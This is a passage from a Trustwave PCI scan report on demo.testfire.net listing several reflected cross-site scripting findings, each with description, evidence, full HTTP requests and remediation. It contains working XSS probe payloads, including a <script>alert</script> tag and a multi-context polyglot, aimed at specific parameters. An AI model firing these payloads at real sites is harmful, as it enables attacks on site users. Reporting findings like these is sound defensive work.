site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://65.61.137.117:8080/sendFeedback - name
Injection: <script>alert(15650660.00467)</script>
Detection: An alert was detected containing 15650660.00467

Request: POST http://65.61.137.117:8080/sendFeedback HTTP/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 450 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=%3Cscript%3Ealert%2815650660.00467%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

143 Cross-Site Scripting 4.3 Medium Fail URL: https://demo.testfire.net:8443/sendFeedback


Port: tcp/8443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 451 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://demo.testfire.net:8443/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650661.00617)//>*/alert(15650661.00617)/*
Detection: An alert was detected containing 15650661.00617

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 452 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Request: POST https://demo.testfire.net:8443/sendFeedback HTTP/1.1


Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00617%29%2F%
2F%3E*%2Falert%2815650661.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 453 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

144 Cross-Site Scripting 4.3 Medium Fail URL: http://demo.testfire.net:8080/sendFeedback


Port: tcp/8080

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 454 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://demo.testfire.net:8080/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650659.00617)//>*/alert(15650659.00617)/*
Detection: An alert was detected containing 15650659.00617

Request: POST http://demo.testfire.net:8080/sendFeedback HTTP/1.1


Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650659.00617%29%2F%
2F%3E*%2Falert%2815650659.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 455 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

145 Cross-Site Scripting 4.3 Medium Fail URL: https://65.61.137.117/index.jsp?content=javascript%3A%2F%


2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextare
a%3E%3C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650642.00127%
29%2F%2F%3E*%2Falert%2815650642.00127%29%2F*
Port: tcp/443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 456 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117/index.jsp?content=javascript%3A%2F%2F%27%
2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscri
pt%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650642.00127%29%2F%
2F%3E*%2Falert%2815650642.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650642.00127)//>*/alert(15650642.00127)/*
Detection: An alert was detected containing 15650642.00127
Request: GET
https://65.61.137.117/index.jsp?content=javascript%3A%2F%2F%27%
2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscri
pt%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650642.00127%29%2F%
2F%3E*%2Falert%2815650642.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 457 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

146 Cross-Site Scripting 4.3 Medium Fail URL: https://demo.testfire.net:8443/index.jsp?content=javascript%3


A%2F%2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2F
textarea%3E%3C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00127%
29%2F%2F%3E*%2Falert%2815650661.00127%29%2F*
Port: tcp/8443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 458 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cross-site scripting can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net:8443/index.jsp?content=javascript%3A%2F%2
F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00127%29%2F%
2F%3E*%2Falert%2815650661.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650661.00127)//>*/alert(15650661.00127)/*
Detection: An alert was detected containing 15650661.00127
Request: GET
https://demo.testfire.net:8443/index.jsp?content=javascript%3A%2F%2
F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00127%29%2F%

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 459 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

147 Cross-Site Scripting 4.3 Medium Fail URL: http://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%2


815650656.00037%29%3C%2Fscript%3E
Port: tcp/80

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 460 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%28156506
56.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650656.00037)</script>
Detection: An alert was detected containing 15650656.00037
Request: GET
http://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%28156506
56.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 461 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

148 Cross-Site Scripting 4.3 Medium Fail URL: https://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert


%2815650658.00037%29%3C%2Fscript%3E
Port: tcp/443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 462 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert%28156
50658.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650658.00037)</script>
Detection: An alert was detected containing 15650658.00037
Request: GET
https://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert%28156
50658.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 463 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

149 Cross-Site Scripting 4.3 Medium Fail URL: https://demo.testfire.net/index.jsp?content=javascript%3A%2F


%2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextar
ea%3E%3C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650658.00127%
29%2F%2F%3E*%2Falert%2815650658.00127%29%2F*
Port: tcp/443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 464 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net/index.jsp?content=javascript%3A%2F%2F%27
%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fs
cript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650658.00127%29%2F%
2F%3E*%2Falert%2815650658.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650658.00127)//>*/alert(15650658.00127)/*

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 465 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Request: GET
https://demo.testfire.net/index.jsp?content=javascript%3A%2F%2F%27
%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fs
cript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650658.00127%29%2F%
2F%3E*%2Falert%2815650658.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

150 Cross-Site Scripting 4.3 Medium Fail URL: https://demo.testfire.net/sendFeedback


Port: tcp/443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 466 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://demo.testfire.net/sendFeedback - name
Injection: <script>alert(15650658.00597)</script>
Detection: An alert was detected containing 15650658.00597

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 467 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Request: POST https://demo.testfire.net/sendFeedback HTTP/1.1


Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=%3Cscript%3Ealert%2815650658.00597%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

151 Insecure configuration of 4.3 Medium Fail URL: http://demo.testfire.net/


Cookie attributes Port: tcp/80

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 468 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
A Cookie Vulnerability helps an attacker to gain access to session
information stored in cookies. It may also be used as a 'locator' attack
that precedes a Cross-Site Scripting (XSS) or Man-In-The-Middle attack.
When looking for Cookie Vulnerabilities, an attacker will first observe
cookies through various HTTP proxies and check their attributes. The
